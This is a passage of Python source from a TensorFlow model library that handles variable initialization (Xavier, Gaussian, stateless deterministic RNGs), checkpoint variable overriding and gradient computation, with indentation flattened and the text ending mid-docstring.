var_name = GetVariableName(scope.name)
if tf.get_default_graph().seed is not None:
      # We are in a program/test which needs deterministic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
seed = GenerateSeedFromName(var_name)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
# TODO(b/172827074): we do not natively support var initialization for
# int8 type except for constant initialization.
# NOTE: For int8, we initialize by scaling float32 random values to integer.
if init_dtype == tf.int8:
init_dtype = tf.float32
v_init = _CreateVarInitStateful(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
if var_dtype == tf.int8:
def FloatToInt8Wrapper(init):
def _Wrapper(shape, dtype, partition_info):
del dtype
value = init(shape, init_dtype, partition_info)
scale = tf.math.maximum(
tf.math.reduce_min(value) / -127,
tf.math.reduce_max(value) / 127)
value = tf.divide(value, scale)
return tf.cast(value, tf.int8)
return _Wrapper
v_init = FloatToInt8Wrapper(v_init)
# Variable creators.
def MaybePinVarsToCpu(next_creator, **kwargs):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return next_creator(**kwargs)
return next_creator(**kwargs)
def MaybeOpportunisticVariableReuse(next_creator, **kwargs):
try:
return next_creator(**kwargs)
except ValueError: # Possibly the variable already exists
if GetOpportunisticVariableReuse():
with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
return next_creator(**kwargs)
else:
raise
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
with VariableCreatorScope(MaybeOpportunisticVariableReuse):
with VariableCreatorScope(MaybePinVarsToCpu):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _CreateVariableStateless(name,
params,
reuse=None,
trainable=True,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable using TF stateless RNGs according to `params`.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
The created variable.
"""
p = params.Copy()
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
else:
dim0 = 1
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
user_seed = seed if seed is not None else default_seed
seed = _GenerateStatelessRngSeed(var_name, user_seed)
# If var_name matches a regex, then set the var_dtype; else use p.dtype.
var_dtype = FindDataType(var_name)
if var_dtype is None:
var_dtype = p.dtype
init_dtype = var_dtype.real_dtype
v_init = _CreateVarInitStateless(name, method, shape, dim0, seed, scale,
init_dtype)
if var_dtype == tf.complex64:
raise TypeError(
'Stateless variable initialization does not support tf.complex64.')
def LingvoVariableCreator(next_creator, **kwargs):
"""Lingvo variable creator."""
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
with tf.variable_scope(name) as scope:
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=True)
with tf.variable_scope(var_scope), tf.variable_scope(var_name, reuse=reuse):
var = next_creator(**kwargs)
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p.ToText(), ('Cached config:\n %s vs new config:\n %s' %
(cached, p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.ToText()
for col in p.collections:
tf.add_to_collection(col, var)
return var
with VariableCreatorScope(LingvoVariableCreator):
var = _GetVariableCreator()(
var_name=var_name,
var_params=p,
name='var',
shape=GetVariableShapePrefixes() + list(shape),
dtype=var_dtype,
initializer=v_init,
collections=collections,
trainable=trainable,
validate_shape=True,
synchronization=synchronization,
aggregation=aggregation)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if combined_layers_dims > 0:
# pylint: disable=protected-access
var.op._set_attr('_num_leading_dims_for_combined_layers',
attr_value_pb2.AttrValue(i=combined_layers_dims))
# Shard the variable according to the sharding spec.
tensor_split_dims_mapping = p.tensor_split_dims_mapping
if tensor_split_dims_mapping is not None:
count = (
len(GetVariableShapePrefixes()) + len(shape) -
len(tensor_split_dims_mapping) -
len(gshard_utils.GetMeshSplitDimPrefixContext()))
tensor_split_dims_mapping = [-1] * count + tensor_split_dims_mapping
var = gshard_utils.MeshSplit(
var, p.device_mesh, tensor_split_dims_mapping, use_sharding_op=False)
return var
def _RandomXavierUniformInitializer(method, scale, seed):
"""Creates a random Xavier uniform initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
return XavierUniform
def _CreateVarInitStateful(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateful RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = init_ops.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = init_ops.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method == 'category':
uniform_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = tf.variance_scaling_initializer(
scale=scale,
mode='fan_avg',
distribution='uniform',
seed=seed,
dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type `%s` not supported.' % method
return v_init
def _GenerateStatelessRngSeed(name, seed):
"""Generates a 2-tuple seed for a stateless variable initializer.
We want to ensure that different variables end up with different random values
even when they are passed the same seed and shape. To this aim, this function
generates a pseudo-unique seed by hashing the variable name and mapping it
into a scalar seed. More specifically, the returned value is a 2-tuple of
tf.int32 scalar, where the first element is the user-provided seed and the
second element is obtained by hashing the variable name.
Args:
name: The variable name for which to generate a stateless-like seed.
seed: The user-specified scalar seed.
Returns:
A 2-tuple seed of tf.int32 values (for TPU compatibility).
"""
seed0 = seed or 0
seed1 = GenerateSeedFromName(name)
return tf.constant([seed0, seed1], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
"""Creates a random normal initializer."""
def DeterministicNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicNormal
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
"""Creates a random uniform initializer."""
def DeterministicUniform(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)
return DeterministicUniform
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
"""Creates a random truncated normal initializer."""
def DeterministicTruncatedNormal(shape, dtype, partition_info):
del partition_info # Unused.
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)
return DeterministicTruncatedNormal
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
"""Creates a random uniform unit scaling initializer."""
def DeterministicUniformUnitScaling(shape, dtype, partition_info):
# The following logic is originally from (UniformUnitScaling.__call__())
# in TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
input_size = 1.0
# Estimating input size is not possible to do perfectly, but we try.
# The estimate, obtained by multiplying all dimensions but the last one,
# is the right thing for matrix multiply and convolutions (see above).
for dim in scale_shape[:-1]:
input_size *= float(dim)
# Avoid errors when initializing zero-size tensors.
input_size = max(input_size, 1.0)
maxval = math.sqrt(3 / input_size) * factor
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-maxval, maxval=maxval, dtype=dtype)
return DeterministicUniformUnitScaling
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
seed):
"""Creates a variance scaling initializer."""
if scale <= 0.:
raise ValueError('`scale` must be positive float.')
if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
raise ValueError('Invalid `mode` argument:', mode)
distribution = distribution.lower()
if distribution not in {
'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
}:
raise ValueError('Invalid `distribution` argument:', distribution)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def DeterministicVarianceScaling(shape, dtype, partition_info):
# This is originally from TensorFlow: python/ops/init_ops.py
scale_shape = shape
if partition_info is not None:
scale_shape = partition_info.full_shape
# Handle special case of empty list as shape, since fan_in and fan_out
# are numerically added below. Without this, GetFanInFanOut() would
# return None, None instead.
if isinstance(scale_shape, (list, tuple)) and not scale_shape:
fan_in, fan_out = 1, 1
else:
fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
if mode == 'fan_in':
scale_inner = scale / max(1., fan_in)
elif mode == 'fan_out':
scale_inner = scale / max(1., fan_out)
else:
scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
if distribution == 'normal' or distribution == 'truncated_normal':
# constant taken from scipy.stats.truncnorm.std(
# a=-2, b=2, loc=0., scale=1.)
stddev = math.sqrt(scale_inner) / .87962566103423978
return stateless_random_ops.stateless_truncated_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
elif distribution == 'untruncated_normal':
stddev = math.sqrt(scale_inner)
return stateless_random_ops.stateless_random_normal(
shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
else:
limit = math.sqrt(3.0 * scale_inner)
return stateless_random_ops.stateless_random_uniform(
shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)
return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
"""Creates a variance scaling initializer."""
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
del partition_info # Unused.
if not shape:
raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * stateless_random_ops.stateless_random_uniform(
shape, seed, -limit, limit, dtype)
return XavierUniform
def _CreateVarInitStateless(name, method, shape, dim0, seed, scale, init_dtype):
"""Creates variable initialization function for a stateless RNG."""
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
if method in ['gaussian_sqrt_fanavg']:
fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
if fan_in is not None and fan_out is not None:
scale *= math.sqrt(2.0 / (fan_in + fan_out))
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
]:
v_init = _DeterministicRandomNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-scale, maxval=scale)
elif method in ['uniform_positive']:
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=0., maxval=scale)
elif method in ['uniform_unit_scaling']:
v_init = _DeterministicRandomUniformUnitScalingInitializer(
seed=seed, factor=scale)
elif method in ['uniform_unit_scaling_fan_avg']:
v_init = _DeterministicRandomVarianceScalingInitializer(
scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = _DeterministicRandomTruncatedNormalInitializer(
seed=seed, mean=0., stddev=scale)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = _DeterministicRandomUniformInitializer(
seed=seed, minval=-bound, maxval=bound)
else:
assert False, 'init_type %s not supported.' % method
return v_init
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
    # module load time, because it lets us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = ThreadLocalStack()
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.stack.append(global_step_tensor)
try:
yield
finally:
_GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK.stack:
return _GLOBAL_STEP_STACK.stack[-1]
return tf.train.get_global_step()
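# A minimal usage sketch of GlobalStepContext/GetGlobalStep, assuming `step_tensor` is a
# scalar step tensor supplied by the caller; outside the context GetGlobalStep falls
# back to tf.train.get_global_step().
def _ExampleGlobalStepContext(step_tensor):
  with GlobalStepContext(step_tensor):
    return GetGlobalStep()  # Returns step_tensor while the context is active.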
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.train.get_or_create_global_step()
else:
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity:
"""Helper class."""
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules,
ckpt_path):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
unused_rules = {
regexp: name_format for regexp, name_format in variable_loading_rules
}
vars_to_load = []
for model_var in all_vars:
loaded = False
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match:
tf.logging.debug('Loading rules do not match %s.', model_var.name)
continue
elif any(re.match(r, model_var.name) for r in var_ignore_rules):
tf.logging.debug('Ignoring %s from loading.', model_var.name)
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
checkpoint_var_name, regexp)
vars_to_load.append((checkpoint_var_name, model_var))
unused_rules.pop(regexp, None)
loaded = True
break
if not loaded:
tf.logging.info(
'Not loading model variable %s from %s as it does not match any rules'
          ' or matches an ignore rule.', model_var.name, ckpt_path)
for regexp, name_format in unused_rules.items():
tf.logging.warning(f'User provided rule matched no variables: ({regexp}, '
f'{name_format})')
return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Add TF graph ops to override variables from a provided checkpoint.
Args:
all_vars: List of all the parameters in the model.
checkpoint_path: A path to the checkpoints of a pretrained model.
variable_loading_rules: A list of tuples of strings defining (regex to match
parameter names in the model to override, format string to determine the
corresponding var in the checkpoint).
var_ignore_rules: A list consisting of a list of regexes to match parameter
names in the model which should not be overridden, even if they match
those in the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from the provided checkpoint.
"""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules, checkpoint_path)
if not vars_to_load:
all_rules_text = '\n'.join(
[f'{k} --> {v}' for k, v in variable_loading_rules])
raise ValueError(f'Variable loading rules {all_rules_text} '
f'did not match any of {len(all_vars)} vars.')
load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
f'{checkpoint_path}:\n{load_var_names}')
savers = []
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
vars_to_load = remaining_vars_to_load
def _Restore(sess):
for saver in savers:
saver.restore(sess, checkpoint_path)
return _Restore
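# A minimal usage sketch of OverrideVarsFromCheckpoint. The checkpoint path, the
# regex/format loading rules, and the ignore rule below are hypothetical.
def _ExampleOverrideVarsFromCheckpoint(sess, all_vars):
  restore_fn = OverrideVarsFromCheckpoint(
      all_vars=all_vars,
      checkpoint_path='/tmp/pretrained/ckpt-100000',
      variable_loading_rules=[('(.*)', '%s')],  # Load each var under its own name.
      var_ignore_rules=['.*global_step.*'])
  restore_fn(sess)  # Runs the underlying tf.train.Saver restores.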
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
"""Add TF graph ops to override model variables from checkpoints.
Args:
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Returns:
A callable that, when called with a tf.Session, will restore the variables
from checkpoint and return a list of overwritten variables.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
var_names_overridden = set()
restore_fns = []
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
to_load_vars = _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1],
ckpt_path)
var_refs_to_override = [var[1].experimental_ref() for var in to_load_vars]
var_names_to_override = [var[1].name for var in to_load_vars]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
restore_fns.append(
OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
loading_rules[1]))
var_refs_overridden.update(var_refs_to_override)
var_names_overridden.update(var_names_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def _Restore(sess):
for fn in restore_fns:
fn(sess)
return var_names_overridden
return _Restore
def ComputeGradientsSimple(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
activations_grad=None):
"""Compute gradients."""
tape = _GRADIENT_TAPE_STACK.stack[-1] if _GRADIENT_TAPE_STACK.stack else None
if IsEagerMode() and tape:
tf.logging.info('ComputeGradientsSimple: using gradient tape.')
if activations_grad is not None:
raise ValueError('GradientTape does not accept gradient input values.')
if grad_aggregation_method or colocate_gradients_with_ops or gate_gradients:
tf.logging.warning(
          'When GradientTape is used, these fields will be ignored: '
f'grad_aggregation_method ({grad_aggregation_method}), '
f'colocate_gradients_with_ops ({colocate_gradients_with_ops}), '
f'gate_gradients ({gate_gradients}).')
return tape.gradient(
loss_or_activations,
all_vars,
unconnected_gradients=tf.UnconnectedGradients.ZERO)
return tf.gradients(
loss_or_activations,
all_vars,
grad_ys=activations_grad,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients for local loss across whole TPU cluster.
  This implementation handles the case where weight params may be used a
  different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss_or_activations: The loss or activations to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This helps reducing the number of gradient all-reduces
when doing gradient accumulation, which does gradient cross replica sum
